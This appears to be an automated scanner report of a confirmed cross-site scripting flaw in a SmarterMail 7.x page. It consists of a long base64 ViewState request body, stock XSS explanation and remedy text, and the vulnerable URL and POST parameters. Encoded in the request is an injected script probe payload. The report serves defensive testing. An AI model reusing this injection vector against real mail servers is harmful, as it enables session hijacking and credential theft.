YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQURRW5hYmxlTXVsdGlTZWxlY3RoBQ9SZW5kZXJJbnZpc2libGVnBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAEBXIFMFUQgFA0VSU2gFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRJOYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNYXhEBgAA25l6PzEJDxYIHw0FDFNtYXJ0ZXJUb29scx8RaB8LaB8YaGRkFgQfCgULcmNNYWluVGFibGUfCQICFgQfCgUMcmNPdGhlck1vbnRoHwkCAmQWBB8KBQpyY1NlbGVjdGVkHwkCAmQWBB8KBQpyY0Rpc2FibGVkHwkCAhYEHwoFDHJjT3V0T2ZSYW5nZR8JAgIWBB8KBQlyY1dlZWtlbmQfCQICFgQfCgUHcmNIb3Zlch8JAgIWBB8KBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfCQICFgQfCgUJcmNWaWV3U2VsHwkCAmQCAw8PFgQfHAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmHyYFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZhYCHycFTHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JyksJ3RpbWUnKTtkAgQPFCsAAg8WDh4JU3RhcnRU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BRFyaVRleHRCb3ggcmlFcnJvch8JAoICFgYfCBsAAAAAAABZQAcAAAAfCgUTcmlUZXh0Qm94IHJpRm9jdXNlZB8JAoICFgYfCBsAAAAAAABZQAcAAAAfCgUTcmlUZXh0Qm94IHJpRW5hYmxlZB8JAoICFgYfCBsAAAAAAABZQAcAAAAfCgUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfCQKCAhYGHwgbAAAAAAAAWUAHAAAAHwoFEXJpVGV4dEJveCByaUVtcHR5HwkCggIWBh8IGwAAAAAAAFlABwAAAB8KBRByaVRleHRCb3ggcmlSZWFkHwkCggJkAgEPDxYEHxwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmHyYFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIfJwVJcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9FbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JyksJ2NhbCcpO2QCAg8UKwANDxYaBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQURRW5hYmxlTXVsdGlTZWxlY3RoBQ9SZW5kZXJJbnZpc2libGVnBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAEBXIFMFUQgFA0VSU2gFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRJOYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNYXhEBgAA25l6PzEJDxYIHw0FDFNtYXJ0ZXJUb29scx8RaB8LaB8YaGRkFgQfCgULcmNNYWluVGFibGUfCQICFgQfCgUMcmNPdGhlck1vbnRoHwkCAmQWBB8KBQpyY1NlbGVjdGVkHwkCAmQWBB8KBQpyY0Rpc2FibGVkHwkCAhYEHwoFDHJjT3V0T2ZSYW5nZR8JAgIWBB8KBQlyY1dlZWtlbmQfCQICFgQfCgUHcmNIb3Zlch8JAgIWBB8KBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfCQICFgQfCgUJcmNWaWV3U2VsHwkCAmQCAw8PFgQfHAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmHyYFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZhYCHycFSnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCd0aW1lJyk7ZAIEDxQrAAIPFg4fKCgrBQgwNzowMDowMB8pKCsFCDE5OjAwOjAwHyooKwUIMDA6MTU6MDAfC2gfEWgfDQUMU21hcnRlclRvb2xzHxhoZBYEHwoFB3JjSG92ZXIfCQICFgJmDxQrAAkPFgYfKwIEHywWAB8tAjBkFgQfCmUfCQICZBYEHwplHwkCAmRkFgQfCgUIcmNIZWFkZXIfCQICFgQfCgUIcmNGb290ZXIfCQICFgYfCBsAAAAAAEBvQAEAAAAfCgU0UmFkQ2FsZW5kYXJUaW1lVmlldyBSYWRDYWxlbmRhclRpbWVWaWV3X1NtYXJ0ZXJUb29scx8JAoICFmACAQ9kFgJmDxYCHy4FBzc6MDAgQU1kAgIPZBYCZg8W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ZBYKZg8QDxYCHwcFBE9uY2VkZGRkAgIPEA8WAh8HBQVEYWlseWRkZGQCBA8QDxYCHwcFBldlZWtseWRkZGQCBg8QDxYCHwcFB01vbnRobHlkZGRkAggPEA8WAh8HBQZZZWFybHlkZGRkAgEPZBYKZg8WAh8FaBYEAgEPEA8WAh8HBQVFdmVyeWRkZGQCBw8QDxYCHwcFDUV2ZXJ5IHdlZWtkYXlkZGRkAgEPFgIfBWgWDgIHDxAPFgIfBwUGU3VuZGF5ZGRkZAIJDxAPFgIfBwUGTW9uZGF5ZGRkZAILDxAPFgIfBwUHVHVlc2RheWRkZGQCDQ8QDxYCHwcFCVdlZG5lc2RheWRkZGQCDw8QDxYCHwcFCFRodXJzZGF5ZGRkZAIRDxAPFgIfBwUGRnJpZGF5ZGRkZAITDxAPFgQfBwUIU2F0dXJkYXkeB0NoZWNrZWRnZGRkZAICDxYCHwVoFgoCBw8QDxYCHwcFA0RheWRkZGQCCQ8PFgIfBwUBM2RkAgsPEA8WAh8HBQNUaGVkZGRkAg0PEGQPFgVmAgECAgIDAgQWBRAFBWZpcnN0BQVmaXJzdGcQBQZzZWNvbmQFBnNlY29uZGcQBQV0aGlyZAUFdGhpcmRnEAUGZm91cnRoBQZmb3VydGhnEAUEbGFzdAUEbGFzdGcWAWZkAg8PEGQPFgdmAgECAgIDAgQCBQIGFgcQBQZNb25kYXkFBk1vbmRheWcQBQdUdWVzZGF5BQdUdWVzZGF5ZxAFCVdlZG5lc2RheQUJV2VkbmVzZGF5ZxAFCFRodXJzZGF5BQhUaHVyc2RheWcQBQZGcmlkYXkFBkZyaWRheWcQBQhTYXR1cmRheQUIU2F0dXJkYXlnEAUGU3VuZGF5BQZTdW5kYXlnFgECBWQCAw8WAh8FaBYOAgEPEA8WAh8HBQVFdmVyeWRkZGQCAw8QZA8WDGYCAQICAgMCBAIFAgYCBwIIAgkCCgILFgwQBQdKYW51YXJ5BQdKYW51YXJ5ZxAFCEZlYnJ1YXJ5BQhGZWJydWFyeWcQBQVNYXJjaAUFTWFyY2hnEAUFQXByaWwFBUFwcmlsZxAFA01heQUDTWF5ZxAFBEp1bmUFBEp1bmVnEAUESnVseQUESnVseWcQBQZBdWd1c3QFBkF1Z3VzdGcQBQlTZXB0ZW1iZXIFCVNlcHRlbWJlcmcQBQdPY3RvYmVyBQdPY3RvYmVyZxAFCE5vdmVtYmVyBQhOb3ZlbWJlcmcQBQhEZWNlbWJlcgUIRGVjZW1iZXJnFgECCWQCBQ8PFgIfBwUBM2RkAgcPEA8WAh8HBQNUaGVkZGRkAgkPEGQPFgVmAgECAgIDAgQWBRAFBWZpcnN0BQVmaXJzdGcQBQZzZWNvbmQFBnNlY29uZGcQBQV0aGlyZAUFdGhpcmRnEAUGZm91cnRoBQZmb3VydGhnEAUEbGFzdAUEbGFzdGcWAWZkAgsPEGQPFgdmAgECAgIDAgQCBQIGFgcQBQZNb25kYXkFBk1vbmRheWcQBQdUdWVzZGF5BQdUdWVzZGF5ZxAFCVdlZG5lc2RheQUJV2VkbmVzZGF5ZxAFCFRodXJzZGF5BQhUaHVyc2RheWcQBQZGcmlkYXkFBkZyaWRheWcQBQhTYXR1cmRheQUIU2F0dXJkYXlnEAUGU3VuZGF5BQZTdW5kYXlnFgECBWQCDw8QZA8WDGYCAQICAgMCBAIFAgYCBwIIAgkCCgILFgwQBQdKYW51YXJ5BQdKYW51YXJ5ZxAFCEZlYnJ1YXJ5BQhGZWJydWFyeWcQBQVNYXJjaAUFTWFyY2hnEAUFQXByaWwFBUFwcmlsZxAFA01heQUDTWF5ZxAFBEp1bmUFBEp1bmVnEAUESnVseQUESnVseWcQBQZBdWd1c3QFBkF1Z3VzdGcQBQlTZXB0ZW1iZXIFCVNlcHRlbWJlcmcQBQdPY3RvYmVyBQdPY3RvYmVyZxAFCE5vdmVtYmVyBQhOb3ZlbWJlcmcQBQhEZWNlbWJlcgUIRGVjZW1iZXJnFgECCWQCBA8WAh8FaBYIAgEPEA8WAh8HBQdGb3JldmVyZGRkZAIDDxAPFgIfBwUJRW5kIGFmdGVyZGRkZAIJDxAPFgIfBwUGRW5kIGJ5ZGRkZAILDw8WEB8gBgBAyvij6OAHHx8GAABFh3ZPzkgfHgYAAGjBKVyhCR8LaB8RaB8NBQxTbWFydGVyVG9vbHMfCgUSRGF0ZVBpY2tlck92ZXJyaWRlHwkCAmQWBmYPPCsACAEADxYQHyAGAEDK+KPo4AcfBwUTMjAxMS0xMC0wMy0wMC0wMC0wMB8IGwAAAAAAAFlABwAAAB4GSGVpZ2h0HB8eBgAAaMEpXKEJHwtoHxFoHwkCgANkZAIBDw8WBB8cBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8mBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHycFOXJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kQnlEYXRlJyksJ2NhbCcpO2QCAg88KwANAQAPFhQFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAyvij6OAHBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNYXhEBgAAaMEpXKEJDxYGHw0FDFNtYXJ0ZXJUb29scx8RaB8LaGRkAgYPZBYCAgEPZBYCZg9kFgJmDw8WBB8KBQ5JbmRlbnQgU2V0dGluZx8JAgJkZAIID2QWBAIDDw8WAh8HBQExZGQCBQ8PFgIfBwUdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD5kZBgGBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y2wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BDYXRlZ29yaWVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMcHZDYXRlZ29yaWVzC2QFF2N0bDAwJFRQSCRUYWJTdHJpcCRUYWI0DzLeCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5l..
Cross-site Scripting

Cross-site Scripting

2 TOTAL
MEDIUM
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Main/frmPopupCopyArchiveMessagesToMailbox.aspx

/Main/frmPopupCopyArchiveMessagesToMailbox.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupCopyArchiveMessagesToMailbox.aspx

Parameters

Parameter Type Value
__EVENTTARGET POST ctl00$BrPH$btnOK
__EVENTARGUMENT POST 3
